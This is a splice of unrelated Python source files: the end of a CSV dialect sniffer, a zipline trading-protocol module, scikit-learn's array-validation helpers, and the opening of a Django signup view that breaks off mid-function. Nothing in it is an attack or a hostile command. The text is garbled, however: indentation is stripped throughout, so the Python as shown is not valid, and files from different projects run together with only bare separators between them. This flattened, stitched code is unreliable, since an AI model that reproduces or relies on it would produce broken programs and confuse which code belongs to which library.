# fallback to length of string
thisType = len(row[col])
if thisType != columnTypes[col]:
if columnTypes[col] is None: # add new column type
columnTypes[col] = thisType
else:
# type is inconsistent, remove column from
# consideration
del columnTypes[col]
# finally, compare results against first row and "vote"
# on whether it's a header
hasHeader = 0
for col, colType in columnTypes.items():
if type(colType) == type(0): # it's a length
if len(header[col]) != colType:
hasHeader += 1
else:
hasHeader -= 1
else: # attempt typecast
try:
colType(header[col])
except (ValueError, TypeError):
hasHeader += 1
else:
hasHeader -= 1
return hasHeader > 0
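# Usage sketch for the Sniffer above (sample text invented, helper name ours):
# detect the dialect of a small sample, re-parse it with that dialect, and ask
# whether the first row looks like a header.
def _example_sniff_sample():
    sample = "name,age\r\nalice,30\r\nbob,25\r\n"
    sniffer = Sniffer()
    dialect = sniffer.sniff(sample)              # delimiter ',' expected here
    rows = list(reader(StringIO(sample), dialect))
    return dialect.delimiter, sniffer.has_header(sample), rows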
|
|
#
# Copyright 2013 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from six import iteritems, iterkeys
import pandas as pd
from .utils.protocol_utils import Enum
from zipline.finance.trading import with_environment
from zipline.utils.algo_instance import get_algo_instance
# Datasource type should completely determine the other fields of a
# message with its type.
DATASOURCE_TYPE = Enum(
'AS_TRADED_EQUITY',
'MERGER',
'SPLIT',
'DIVIDEND',
'TRADE',
'TRANSACTION',
'ORDER',
'EMPTY',
'DONE',
'CUSTOM',
'BENCHMARK',
'COMMISSION'
)
# Expected fields/index values for a dividend Series.
DIVIDEND_FIELDS = [
'declared_date',
'ex_date',
'gross_amount',
'net_amount',
'pay_date',
'payment_sid',
'ratio',
'sid',
]
# Expected fields/index values for a dividend payment Series.
DIVIDEND_PAYMENT_FIELDS = ['id', 'payment_sid', 'cash_amount', 'share_count']
def dividend_payment(data=None):
"""
Take a dictionary whose values are in DIVIDEND_PAYMENT_FIELDS and return a
series representing the payment of a dividend.
Ids are assigned to each historical dividend in
    PerformanceTracker.update_dividends. They are guaranteed to be unique
    integers within the context of a single simulation. If @data is non-empty,
    an id is required to identify the historical dividend associated with this
payment.
Additionally, if @data is non-empty, either data['cash_amount'] should be
nonzero or data['payment_sid'] should be a security identifier and
data['share_count'] should be nonzero.
The returned Series is given its id value as a name so that concatenating
payments results in a DataFrame indexed by id. (Note, however, that the
name value is not used to construct an index when this series is returned
    by a function passed to `DataFrame.apply`. In such a case, pandas preserves
the index of the DataFrame on which `apply` is being called.)
"""
return pd.Series(
data=data,
name=data['id'] if data is not None else None,
index=DIVIDEND_PAYMENT_FIELDS,
dtype=object,
)
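# Illustrative call (all values invented, helper name ours): the returned
# Series is named by its id, so concatenating several payments yields a
# DataFrame indexed by id.
def _example_dividend_payment():
    return dividend_payment({
        'id': 1,
        'payment_sid': None,
        'cash_amount': 0.5,
        'share_count': 0,
    })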
class Event(object):
def __init__(self, initial_values=None):
if initial_values:
self.__dict__ = initial_values
def __getitem__(self, name):
return getattr(self, name)
def __setitem__(self, name, value):
setattr(self, name, value)
def __delitem__(self, name):
delattr(self, name)
def keys(self):
return self.__dict__.keys()
def __eq__(self, other):
return hasattr(other, '__dict__') and self.__dict__ == other.__dict__
def __contains__(self, name):
return name in self.__dict__
def __repr__(self):
return "Event({0})".format(self.__dict__)
def to_series(self, index=None):
return pd.Series(self.__dict__, index=index)
class Order(Event):
pass
class Portfolio(object):
def __init__(self):
self.capital_used = 0.0
self.starting_cash = 0.0
self.portfolio_value = 0.0
self.pnl = 0.0
self.returns = 0.0
self.cash = 0.0
self.positions = Positions()
self.start_date = None
self.positions_value = 0.0
def __getitem__(self, key):
return self.__dict__[key]
def __repr__(self):
return "Portfolio({0})".format(self.__dict__)
class Account(object):
'''
The account object tracks information about the trading account. The
values are updated as the algorithm runs and its keys remain unchanged.
If connected to a broker, one can update these values with the trading
account values as reported by the broker.
'''
def __init__(self):
self.settled_cash = 0.0
self.accrued_interest = 0.0
self.buying_power = float('inf')
self.equity_with_loan = 0.0
self.total_positions_value = 0.0
self.regt_equity = 0.0
self.regt_margin = float('inf')
self.initial_margin_requirement = 0.0
self.maintenance_margin_requirement = 0.0
self.available_funds = 0.0
self.excess_liquidity = 0.0
self.cushion = 0.0
self.day_trades_remaining = float('inf')
self.leverage = 0.0
self.net_leverage = 0.0
self.net_liquidation = 0.0
def __getitem__(self, key):
return self.__dict__[key]
def __repr__(self):
return "Account({0})".format(self.__dict__)
def _get_state(self):
return 'Account', self.__dict__
def _set_state(self, saved_state):
self.__dict__.update(saved_state)
class Position(object):
def __init__(self, sid):
self.sid = sid
self.amount = 0
self.cost_basis = 0.0 # per share
self.last_sale_price = 0.0
def __getitem__(self, key):
return self.__dict__[key]
def __repr__(self):
return "Position({0})".format(self.__dict__)
class Positions(dict):
def __missing__(self, key):
pos = Position(key)
self[key] = pos
return pos
class SIDData(object):
    # Cache some data on the class so that this is shared for all instances of
    # SIDData.
# The dt where we cached the history.
_history_cache_dt = None
    # _history_cache is a dict mapping fields to pd.DataFrames. This is the
# most data we have for a given field for the _history_cache_dt.
_history_cache = {}
# This is the cache that is used for returns. This will have a different
# structure than the other history cache as this is always daily.
_returns_cache_dt = None
_returns_cache = None
# The last dt that we needed to cache the number of minutes.
_minute_bar_cache_dt = None
# If we are in minute mode, there is some cost associated with computing
# the number of minutes that we need to pass to the bar count of history.
# This will remain constant for a given bar and day count.
# This maps days to number of minutes.
_minute_bar_cache = {}
def __init__(self, sid, initial_values=None):
self._sid = sid
self._freqstr = None
# To check if we have data, we use the __len__ which depends on the
        # __dict__. Because we are forward-defining the attributes needed, we
        # need to account for their entries in the __dict__.
# We will add 1 because we need to account for the _initial_len entry
# itself.
self._initial_len = len(self.__dict__) + 1
if initial_values:
self.__dict__.update(initial_values)
@property
def datetime(self):
"""
Provides an alias from data['foo'].datetime -> data['foo'].dt
        `datetime` was previously provided by adding a separate `datetime`
member of the SIDData object via a generator that wrapped the incoming
data feed and added the field to each equity event.
This alias is intended to be temporary, to provide backwards
compatibility with existing algorithms, but should be considered
deprecated, and may be removed in the future.
"""
return self.dt
def get(self, name, default=None):
return self.__dict__.get(name, default)
def __getitem__(self, name):
return self.__dict__[name]
def __setitem__(self, name, value):
self.__dict__[name] = value
def __len__(self):
return len(self.__dict__) - self._initial_len
def __contains__(self, name):
return name in self.__dict__
def __repr__(self):
return "SIDData({0})".format(self.__dict__)
def _get_buffer(self, bars, field='price'):
"""
Gets the result of history for the given number of bars and field.
This will cache the results internally.
"""
cls = self.__class__
algo = get_algo_instance()
now = algo.datetime
if now != cls._history_cache_dt:
# For a given dt, the history call for this field will not change.
# We have a new dt, so we should reset the cache.
cls._history_cache_dt = now
cls._history_cache = {}
if field not in self._history_cache \
or bars > len(cls._history_cache[field].index):
# If we have never cached this field OR the amount of bars that we
# need for this field is greater than the amount we have cached,
# then we need to get more history.
hst = algo.history(
bars, self._freqstr, field, ffill=True,
)
# Assert that the column holds ints, not security objects.
if not isinstance(self._sid, str):
hst.columns = hst.columns.astype(int)
self._history_cache[field] = hst
        # Slice off only the bars needed. This is because we store the LARGEST
# amount of history for the field, and we might request less than the
# largest from the cache.
return cls._history_cache[field][self._sid][-bars:]
def _get_bars(self, days):
"""
Gets the number of bars needed for the current number of days.
Figures this out based on the algo datafrequency and caches the result.
This caches the result by replacing this function on the object.
This means that after the first call to _get_bars, this method will
point to a new function object.
"""
def daily_get_bars(days):
return days
@with_environment()
def minute_get_bars(days, env=None):
cls = self.__class__
now = get_algo_instance().datetime
if now != cls._minute_bar_cache_dt:
cls._minute_bar_cache_dt = now
cls._minute_bar_cache = {}
if days not in cls._minute_bar_cache:
# Cache this calculation to happen once per bar, even if we
# use another transform with the same number of days.
prev = env.previous_trading_day(now)
ds = env.days_in_range(
env.add_trading_days(-days + 2, prev),
prev,
)
# compute the number of minutes in the (days - 1) days before
# today.
                # 210 minutes in an early-close day and 390 in a full day.
ms = sum(210 if d in env.early_closes else 390 for d in ds)
# Add the number of minutes for today.
ms += int(
(now - env.get_open_and_close(now)[0]).total_seconds() / 60
)
cls._minute_bar_cache[days] = ms + 1 # Account for this minute
return cls._minute_bar_cache[days]
if get_algo_instance().sim_params.data_frequency == 'daily':
self._freqstr = '1d'
# update this method to point to the daily variant.
self._get_bars = daily_get_bars
else:
self._freqstr = '1m'
# update this method to point to the minute variant.
self._get_bars = minute_get_bars
# Not actually recursive because we have already cached the new method.
return self._get_bars(days)
def mavg(self, days):
return self._get_buffer(self._get_bars(days)).mean()
def stddev(self, days):
return self._get_buffer(self._get_bars(days)).std(ddof=1)
def vwap(self, days):
bars = self._get_bars(days)
prices = self._get_buffer(bars)
vols = self._get_buffer(bars, field='volume')
return (prices * vols).sum() / vols.sum()
def returns(self):
algo = get_algo_instance()
now = algo.datetime
if now != self._returns_cache_dt:
self._returns_cache_dt = now
self._returns_cache = algo.history(2, '1d', 'price', ffill=True)
hst = self._returns_cache[self._sid]
return (hst.iloc[-1] - hst.iloc[0]) / hst.iloc[0]
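# Standalone sketch (class name ours, not used elsewhere) of the
# self-replacing-method caching trick that _get_bars relies on: the first call
# installs a specialised function on the instance, so later calls skip the
# data-frequency check entirely.
class _SelfReplacingMethodExample(object):
    def compute(self, n):
        def fast_compute(n):
            return n * 2
        # Shadow the bound method; subsequent self.compute(n) calls hit this.
        self.compute = fast_compute
        return fast_compute(n)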
class BarData(object):
"""
Holds the event data for all sids for a given dt.
This is what is passed as `data` to the `handle_data` function.
    Note: many methods mirror the dict interface because the object this class
    replaced was a dictionary subclass, and existing algorithms rely on that
    usage.
"""
def __init__(self, data=None):
self._data = data or {}
self._contains_override = None
def __contains__(self, name):
if self._contains_override:
if self._contains_override(name):
return name in self._data
else:
return False
else:
return name in self._data
def has_key(self, name):
"""
DEPRECATED: __contains__ is preferred, but this method is for
compatibility with existing algorithms.
"""
return name in self
def __setitem__(self, name, value):
self._data[name] = value
def __getitem__(self, name):
return self._data[name]
def __delitem__(self, name):
del self._data[name]
def __iter__(self):
for sid, data in iteritems(self._data):
# Allow contains override to filter out sids.
if sid in self:
if len(data):
yield sid
def iterkeys(self):
# Allow contains override to filter out sids.
return (sid for sid in iterkeys(self._data) if sid in self)
def keys(self):
# Allow contains override to filter out sids.
return list(self.iterkeys())
def itervalues(self):
return (value for _sid, value in self.iteritems())
def values(self):
return list(self.itervalues())
def iteritems(self):
return ((sid, value) for sid, value
in iteritems(self._data)
if sid in self)
def items(self):
return list(self.iteritems())
def __len__(self):
return len(self.keys())
def __repr__(self):
return '{0}({1})'.format(self.__class__.__name__, self._data)
|
|
"""Utilities for input validation"""
# Authors: Olivier Grisel
# Gael Varoquaux
# Andreas Mueller
# Lars Buitinck
# Alexandre Gramfort
# Nicolas Tresegnie
# License: BSD 3 clause
import warnings
import numbers
import numpy as np
import scipy.sparse as sp
from ..externals import six
from inspect import getargspec
FLOAT_DTYPES = (np.float64, np.float32, np.float16)
class DataConversionWarning(UserWarning):
"""A warning on implicit data conversions happening in the code"""
pass
warnings.simplefilter("always", DataConversionWarning)
class NonBLASDotWarning(UserWarning):
"""A warning on implicit dispatch to numpy.dot"""
class NotFittedError(ValueError, AttributeError):
"""Exception class to raise if estimator is used before fitting
This class inherits from both ValueError and AttributeError to help with
exception handling and backward compatibility.
"""
# Silenced by default to reduce verbosity. Turn on at runtime for
# performance profiling.
warnings.simplefilter('ignore', NonBLASDotWarning)
def _assert_all_finite(X):
"""Like assert_all_finite, but only for ndarray."""
X = np.asanyarray(X)
# First try an O(n) time, O(1) space solution for the common case that
# everything is finite; fall back to O(n) space np.isfinite to prevent
# false positives from overflow in sum method.
if (X.dtype.char in np.typecodes['AllFloat'] and not np.isfinite(X.sum())
and not np.isfinite(X).all()):
raise ValueError("Input contains NaN, infinity"
" or a value too large for %r." % X.dtype)
def assert_all_finite(X):
"""Throw a ValueError if X contains NaN or infinity.
Input MUST be an np.ndarray instance or a scipy.sparse matrix."""
_assert_all_finite(X.data if sp.issparse(X) else X)
def as_float_array(X, copy=True, force_all_finite=True):
"""Converts an array-like to an array of floats
The new dtype will be np.float32 or np.float64, depending on the original
type. The function can create a copy or modify the argument depending
on the argument copy.
Parameters
----------
X : {array-like, sparse matrix}
copy : bool, optional
If True, a copy of X will be created. If False, a copy may still be
returned if X's dtype is not a floating point type.
force_all_finite : boolean (default=True)
Whether to raise an error on np.inf and np.nan in X.
Returns
-------
XT : {array, sparse matrix}
An array of type np.float
"""
if isinstance(X, np.matrix) or (not isinstance(X, np.ndarray)
and not sp.issparse(X)):
return check_array(X, ['csr', 'csc', 'coo'], dtype=np.float64,
copy=copy, force_all_finite=force_all_finite,
ensure_2d=False)
elif sp.issparse(X) and X.dtype in [np.float32, np.float64]:
return X.copy() if copy else X
elif X.dtype in [np.float32, np.float64]: # is numpy array
return X.copy('F' if X.flags['F_CONTIGUOUS'] else 'C') if copy else X
else:
return X.astype(np.float32 if X.dtype == np.int32 else np.float64)
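# Quick illustration (toy input, helper name ours): an integer nested list is
# returned as a float64 ndarray, while float32/float64 arrays pass through.
def _example_as_float_array():
    return as_float_array([[1, 2], [3, 4]]).dtype  # dtype('float64')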
def _is_arraylike(x):
"""Returns whether the input is array-like"""
return (hasattr(x, '__len__') or
hasattr(x, 'shape') or
hasattr(x, '__array__'))
def _num_samples(x):
"""Return number of samples in array-like x."""
if hasattr(x, 'fit'):
        # Don't get num_samples from an ensemble's length!
raise TypeError('Expected sequence or array-like, got '
'estimator %s' % x)
if not hasattr(x, '__len__') and not hasattr(x, 'shape'):
if hasattr(x, '__array__'):
x = np.asarray(x)
else:
raise TypeError("Expected sequence or array-like, got %s" %
type(x))
if hasattr(x, 'shape'):
if len(x.shape) == 0:
raise TypeError("Singleton array %r cannot be considered"
" a valid collection." % x)
return x.shape[0]
else:
return len(x)
def _shape_repr(shape):
"""Return a platform independent reprensentation of an array shape
Under Python 2, the `long` type introduces an 'L' suffix when using the
default %r format for tuples of integers (typically used to store the shape
of an array).
Under Windows 64 bit (and Python 2), the `long` type is used by default
in numpy shapes even when the integer dimensions are well below 32 bit.
The platform specific type causes string messages or doctests to change
from one platform to another which is not desirable.
Under Python 3, there is no more `long` type so the `L` suffix is never
introduced in string representation.
>>> _shape_repr((1, 2))
'(1, 2)'
>>> one = 2 ** 64 / 2 ** 64 # force an upcast to `long` under Python 2
>>> _shape_repr((one, 2 * one))
'(1, 2)'
>>> _shape_repr((1,))
'(1,)'
>>> _shape_repr(())
'()'
"""
if len(shape) == 0:
return "()"
joined = ", ".join("%d" % e for e in shape)
if len(shape) == 1:
# special notation for singleton tuples
joined += ','
return "(%s)" % joined
def check_consistent_length(*arrays):
"""Check that all arrays have consistent first dimensions.
Checks whether all objects in arrays have the same shape or length.
Parameters
----------
*arrays : list or tuple of input objects.
Objects that will be checked for consistent length.
"""
uniques = np.unique([_num_samples(X) for X in arrays if X is not None])
if len(uniques) > 1:
raise ValueError("Found arrays with inconsistent numbers of samples: "
"%s" % str(uniques))
def indexable(*iterables):
"""Make arrays indexable for cross-validation.
Checks consistent length, passes through None, and ensures that everything
can be indexed by converting sparse matrices to csr and converting
    non-iterable objects to arrays.
Parameters
----------
*iterables : lists, dataframes, arrays, sparse matrices
List of objects to ensure sliceability.
"""
result = []
for X in iterables:
if sp.issparse(X):
result.append(X.tocsr())
elif hasattr(X, "__getitem__") or hasattr(X, "iloc"):
result.append(X)
elif X is None:
result.append(X)
else:
result.append(np.array(X))
check_consistent_length(*result)
return result
def _ensure_sparse_format(spmatrix, accept_sparse, dtype, copy,
force_all_finite):
"""Convert a sparse matrix to a given format.
Checks the sparse format of spmatrix and converts if necessary.
Parameters
----------
spmatrix : scipy sparse matrix
Input to validate and convert.
accept_sparse : string, list of string or None (default=None)
String[s] representing allowed sparse matrix formats ('csc',
'csr', 'coo', 'dok', 'bsr', 'lil', 'dia'). None means that sparse
matrix input will raise an error. If the input is sparse but not in
the allowed format, it will be converted to the first listed format.
dtype : string, type or None (default=none)
Data type of result. If None, the dtype of the input is preserved.
copy : boolean (default=False)
Whether a forced copy will be triggered. If copy=False, a copy might
be triggered by a conversion.
force_all_finite : boolean (default=True)
Whether to raise an error on np.inf and np.nan in X.
Returns
-------
spmatrix_converted : scipy sparse matrix.
Matrix that is ensured to have an allowed type.
"""
if accept_sparse in [None, False]:
raise TypeError('A sparse matrix was passed, but dense '
'data is required. Use X.toarray() to '
'convert to a dense numpy array.')
if dtype is None:
dtype = spmatrix.dtype
changed_format = False
if (isinstance(accept_sparse, (list, tuple))
and spmatrix.format not in accept_sparse):
# create new with correct sparse
spmatrix = spmatrix.asformat(accept_sparse[0])
changed_format = True
if dtype != spmatrix.dtype:
# convert dtype
spmatrix = spmatrix.astype(dtype)
elif copy and not changed_format:
# force copy
spmatrix = spmatrix.copy()
if force_all_finite:
if not hasattr(spmatrix, "data"):
warnings.warn("Can't check %s sparse matrix for nan or inf."
% spmatrix.format)
else:
_assert_all_finite(spmatrix.data)
return spmatrix
def check_array(array, accept_sparse=None, dtype="numeric", order=None,
copy=False, force_all_finite=True, ensure_2d=True,
allow_nd=False, ensure_min_samples=1, ensure_min_features=1,
warn_on_dtype=False, estimator=None):
"""Input validation on an array, list, sparse matrix or similar.
    By default, the input is converted to an at least 2D numpy array.
If the dtype of the array is object, attempt converting to float,
raising on failure.
Parameters
----------
array : object
Input object to check / convert.
accept_sparse : string, list of string or None (default=None)
String[s] representing allowed sparse matrix formats, such as 'csc',
'csr', etc. None means that sparse matrix input will raise an error.
If the input is sparse but not in the allowed format, it will be
converted to the first listed format.
dtype : string, type, list of types or None (default="numeric")
Data type of result. If None, the dtype of the input is preserved.
If "numeric", dtype is preserved unless array.dtype is object.
        If dtype is a list of types, conversion to the first listed type is
        only performed if the dtype of the input is not in the list.
order : 'F', 'C' or None (default=None)
Whether an array will be forced to be fortran or c-style.
copy : boolean (default=False)
Whether a forced copy will be triggered. If copy=False, a copy might
be triggered by a conversion.
force_all_finite : boolean (default=True)
Whether to raise an error on np.inf and np.nan in X.
ensure_2d : boolean (default=True)
Whether to make X at least 2d.
allow_nd : boolean (default=False)
Whether to allow X.ndim > 2.
ensure_min_samples : int (default=1)
Make sure that the array has a minimum number of samples in its first
axis (rows for a 2D array). Setting to 0 disables this check.
ensure_min_features : int (default=1)
Make sure that the 2D array has some minimum number of features
(columns). The default value of 1 rejects empty datasets.
This check is only enforced when the input data has effectively 2
dimensions or is originally 1D and ``ensure_2d`` is True. Setting to 0
disables this check.
warn_on_dtype : boolean (default=False)
Raise DataConversionWarning if the dtype of the input data structure
does not match the requested dtype, causing a memory copy.
estimator : str or estimator instance (default=None)
If passed, include the name of the estimator in warning messages.
Returns
-------
X_converted : object
The converted and validated X.
"""
if isinstance(accept_sparse, str):
accept_sparse = [accept_sparse]
# store whether originally we wanted numeric dtype
dtype_numeric = dtype == "numeric"
dtype_orig = getattr(array, "dtype", None)
if not hasattr(dtype_orig, 'kind'):
# not a data type (e.g. a column named dtype in a pandas DataFrame)
dtype_orig = None
if dtype_numeric:
if dtype_orig is not None and dtype_orig.kind == "O":
# if input is object, convert to float.
dtype = np.float64
else:
dtype = None
if isinstance(dtype, (list, tuple)):
if dtype_orig is not None and dtype_orig in dtype:
# no dtype conversion required
dtype = None
else:
# dtype conversion required. Let's select the first element of the
# list of accepted types.
dtype = dtype[0]
if sp.issparse(array):
array = _ensure_sparse_format(array, accept_sparse, dtype, copy,
force_all_finite)
else:
array = np.array(array, dtype=dtype, order=order, copy=copy)
if ensure_2d:
if array.ndim == 1:
warnings.warn("Passing 1d arrays as data is deprecated and "
"will be removed in 0.18. Reshape your data either using"
"X.reshape(-1, 1) if your data has a single feature or"
"X.reshape(1, -1) if it contains a single sample.",
DeprecationWarning)
array = np.atleast_2d(array)
# To ensure that array flags are maintained
array = np.array(array, dtype=dtype, order=order, copy=copy)
    # make sure we actually converted to numeric:
if dtype_numeric and array.dtype.kind == "O":
array = array.astype(np.float64)
if not allow_nd and array.ndim >= 3:
raise ValueError("Found array with dim %d. Expected <= 2" %
array.ndim)
if force_all_finite:
_assert_all_finite(array)
shape_repr = _shape_repr(array.shape)
if ensure_min_samples > 0:
n_samples = _num_samples(array)
if n_samples < ensure_min_samples:
raise ValueError("Found array with %d sample(s) (shape=%s) while a"
" minimum of %d is required."
% (n_samples, shape_repr, ensure_min_samples))
if ensure_min_features > 0 and array.ndim == 2:
n_features = array.shape[1]
if n_features < ensure_min_features:
raise ValueError("Found array with %d feature(s) (shape=%s) while"
" a minimum of %d is required."
% (n_features, shape_repr, ensure_min_features))
if warn_on_dtype and dtype_orig is not None and array.dtype != dtype_orig:
msg = ("Data with input dtype %s was converted to %s"
% (dtype_orig, array.dtype))
if estimator is not None:
if not isinstance(estimator, six.string_types):
estimator = estimator.__class__.__name__
msg += " by %s" % estimator
warnings.warn(msg, DataConversionWarning)
return array
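# Usage sketch (toy data; this helper is illustrative, not part of the public
# API): a nested list is validated into a 2-D array, and CSR input is accepted
# only because accept_sparse lists the 'csr' format.
def _example_check_array_usage():
    dense = check_array([[1, 2], [3, 4]])
    sparse = check_array(sp.csr_matrix(dense), accept_sparse=['csr'])
    return dense.shape, sparse.format  # (2, 2) and 'csr'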
def check_X_y(X, y, accept_sparse=None, dtype="numeric", order=None, copy=False,
force_all_finite=True, ensure_2d=True, allow_nd=False,
multi_output=False, ensure_min_samples=1,
ensure_min_features=1, y_numeric=False,
warn_on_dtype=False, estimator=None):
"""Input validation for standard estimators.
Checks X and y for consistent length, enforces X 2d and y 1d.
Standard input checks are only applied to y. For multi-label y,
set multi_output=True to allow 2d and sparse y.
If the dtype of X is object, attempt converting to float,
raising on failure.
Parameters
----------
X : nd-array, list or sparse matrix
Input data.
y : nd-array, list or sparse matrix
Labels.
accept_sparse : string, list of string or None (default=None)
String[s] representing allowed sparse matrix formats, such as 'csc',
'csr', etc. None means that sparse matrix input will raise an error.
If the input is sparse but not in the allowed format, it will be
converted to the first listed format.
dtype : string, type, list of types or None (default="numeric")
Data type of result. If None, the dtype of the input is preserved.
If "numeric", dtype is preserved unless array.dtype is object.
        If dtype is a list of types, conversion to the first listed type is
        only performed if the dtype of the input is not in the list.
order : 'F', 'C' or None (default=None)
Whether an array will be forced to be fortran or c-style.
copy : boolean (default=False)
Whether a forced copy will be triggered. If copy=False, a copy might
be triggered by a conversion.
force_all_finite : boolean (default=True)
Whether to raise an error on np.inf and np.nan in X.
ensure_2d : boolean (default=True)
Whether to make X at least 2d.
allow_nd : boolean (default=False)
Whether to allow X.ndim > 2.
multi_output : boolean (default=False)
Whether to allow 2-d y (array or sparse matrix). If false, y will be
validated as a vector.
ensure_min_samples : int (default=1)
Make sure that X has a minimum number of samples in its first
axis (rows for a 2D array).
ensure_min_features : int (default=1)
Make sure that the 2D array has some minimum number of features
(columns). The default value of 1 rejects empty datasets.
This check is only enforced when X has effectively 2 dimensions or
is originally 1D and ``ensure_2d`` is True. Setting to 0 disables
this check.
y_numeric : boolean (default=False)
Whether to ensure that y has a numeric type. If dtype of y is object,
it is converted to float64. Should only be used for regression
algorithms.
warn_on_dtype : boolean (default=False)
Raise DataConversionWarning if the dtype of the input data structure
does not match the requested dtype, causing a memory copy.
estimator : str or estimator instance (default=None)
If passed, include the name of the estimator in warning messages.
Returns
-------
X_converted : object
The converted and validated X.
"""
X = check_array(X, accept_sparse, dtype, order, copy, force_all_finite,
ensure_2d, allow_nd, ensure_min_samples,
ensure_min_features, warn_on_dtype, estimator)
if multi_output:
y = check_array(y, 'csr', force_all_finite=True, ensure_2d=False,
dtype=None)
else:
y = column_or_1d(y, warn=True)
_assert_all_finite(y)
if y_numeric and y.dtype.kind == 'O':
y = y.astype(np.float64)
check_consistent_length(X, y)
return X, y
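# Minimal sketch of estimator-style validation (toy data, helper name ours):
# X comes back as a 2-D array and y as a 1-D array of matching length.
def _example_check_X_y_usage():
    X, y = check_X_y([[0, 1], [1, 0], [1, 1]], [0, 1, 1])
    return X.shape, y.shape  # ((3, 2), (3,))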
def column_or_1d(y, warn=False):
""" Ravel column or 1d numpy array, else raises an error
Parameters
----------
y : array-like
warn : boolean, default False
To control display of warnings.
Returns
-------
y : array
"""
shape = np.shape(y)
if len(shape) == 1:
return np.ravel(y)
if len(shape) == 2 and shape[1] == 1:
if warn:
warnings.warn("A column-vector y was passed when a 1d array was"
" expected. Please change the shape of y to "
"(n_samples, ), for example using ravel().",
DataConversionWarning, stacklevel=2)
return np.ravel(y)
raise ValueError("bad input shape {0}".format(shape))
def check_random_state(seed):
"""Turn seed into a np.random.RandomState instance
If seed is None, return the RandomState singleton used by np.random.
If seed is an int, return a new RandomState instance seeded with seed.
If seed is already a RandomState instance, return it.
Otherwise raise ValueError.
"""
if seed is None or seed is np.random:
return np.random.mtrand._rand
if isinstance(seed, (numbers.Integral, np.integer)):
return np.random.RandomState(seed)
if isinstance(seed, np.random.RandomState):
return seed
raise ValueError('%r cannot be used to seed a numpy.random.RandomState'
' instance' % seed)
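# Hedged illustration (helper name ours): equal integer seeds give
# reproducible streams, while None falls back to numpy's global singleton.
def _example_check_random_state():
    a = check_random_state(0).rand(3)
    b = check_random_state(0).rand(3)
    return np.allclose(a, b), check_random_state(None) is np.random.mtrand._rand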
def has_fit_parameter(estimator, parameter):
"""Checks whether the estimator's fit method supports the given parameter.
Examples
--------
>>> from sklearn.svm import SVC
>>> has_fit_parameter(SVC(), "sample_weight")
True
"""
return parameter in getargspec(estimator.fit)[0]
def check_symmetric(array, tol=1E-10, raise_warning=True,
raise_exception=False):
"""Make sure that array is 2D, square and symmetric.
If the array is not symmetric, then a symmetrized version is returned.
Optionally, a warning or exception is raised if the matrix is not
symmetric.
Parameters
----------
array : nd-array or sparse matrix
Input object to check / convert. Must be two-dimensional and square,
otherwise a ValueError will be raised.
tol : float
Absolute tolerance for equivalence of arrays. Default = 1E-10.
raise_warning : boolean (default=True)
If True then raise a warning if conversion is required.
raise_exception : boolean (default=False)
If True then raise an exception if array is not symmetric.
Returns
-------
array_sym : ndarray or sparse matrix
Symmetrized version of the input array, i.e. the average of array
and array.transpose(). If sparse, then duplicate entries are first
summed and zeros are eliminated.
"""
if (array.ndim != 2) or (array.shape[0] != array.shape[1]):
raise ValueError("array must be 2-dimensional and square. "
"shape = {0}".format(array.shape))
if sp.issparse(array):
diff = array - array.T
# only csr, csc, and coo have `data` attribute
if diff.format not in ['csr', 'csc', 'coo']:
diff = diff.tocsr()
symmetric = np.all(abs(diff.data) < tol)
else:
symmetric = np.allclose(array, array.T, atol=tol)
if not symmetric:
if raise_exception:
raise ValueError("Array must be symmetric")
if raise_warning:
warnings.warn("Array is not symmetric, and will be converted "
"to symmetric by average with its transpose.")
if sp.issparse(array):
conversion = 'to' + array.format
array = getattr(0.5 * (array + array.T), conversion)()
else:
array = 0.5 * (array + array.T)
return array
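# Toy example (values invented, helper name ours): a matrix that is symmetric
# only up to ~1e-3 is averaged with its transpose; the warning is suppressed
# here for brevity.
def _example_check_symmetric():
    a = np.array([[1.0, 2.0], [2.001, 1.0]])
    return check_symmetric(a, raise_warning=False)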
def check_is_fitted(estimator, attributes, msg=None, all_or_any=all):
"""Perform is_fitted validation for estimator.
Checks if the estimator is fitted by verifying the presence of
"all_or_any" of the passed attributes and raises a NotFittedError with the
given message.
Parameters
----------
estimator : estimator instance.
estimator instance for which the check is performed.
attributes : attribute name(s) given as string or a list/tuple of strings
Eg. : ["coef_", "estimator_", ...], "coef_"
msg : string
The default error message is, "This %(name)s instance is not fitted
yet. Call 'fit' with appropriate arguments before using this method."
For custom messages if "%(name)s" is present in the message string,
it is substituted for the estimator name.
Eg. : "Estimator, %(name)s, must be fitted before sparsifying".
all_or_any : callable, {all, any}, default all
Specify whether all or any of the given attributes must exist.
"""
if msg is None:
msg = ("This %(name)s instance is not fitted yet. Call 'fit' with "
"appropriate arguments before using this method.")
if not hasattr(estimator, 'fit'):
raise TypeError("%s is not an estimator instance." % (estimator))
if not isinstance(attributes, (list, tuple)):
attributes = [attributes]
if not all_or_any([hasattr(estimator, attr) for attr in attributes]):
raise NotFittedError(msg % {'name': type(estimator).__name__})
def check_non_negative(X, whom):
"""
Check if there is any negative value in an array.
Parameters
----------
X : array-like or sparse matrix
Input data.
whom : string
Who passed X to this function.
"""
X = X.data if sp.issparse(X) else X
if (X < 0).any():
raise ValueError("Negative values in data passed to %s" % whom)
|
|
import datetime
from django.core.exceptions import ObjectDoesNotExist
from django.db import IntegrityError
from django.contrib.auth.decorators import login_required
from django.contrib.auth import authenticate, login, logout
from django.contrib import messages
from django.http import HttpResponse, JsonResponse
from django.shortcuts import render, redirect, get_object_or_404
from django.views.decorators.cache import cache_page, cache_control, never_cache
from django.views.decorators.csrf import csrf_exempt
from main.forms import UserCreationForm
from main.models import User, ApiKey, Domain
from urllib.parse import urlparse
import json
import jwt
def index(request):
context = {
}
return render(request, 'main/pages/index.html', context)
def user_signup(request):
context = {
}
if request.is_ajax():
response_data = {}
data = json.loads(request.body.decode('utf-8'))
postEmail = data.get('email')
postUsername = data.get('username')
postPassword = data.get('password')
user = User(email=postEmail, username=postUsername)
user.set_password(postPassword)
try:
user.save()
        except IntegrityError:
response_data['status'] = False
response_data['msg'] = 'Sorry! This email is already signed up.'
return HttpResponse(json.dumps(response_data),
content_type="application/json"
)
response_data['status'] = True
response_data['msg'] = 'Success!'
return HttpResponse(
json.dumps(response_data),
content_type="application/json"
)
else:
if request.method == 'POST':
form = UserCreationForm(request.POST)
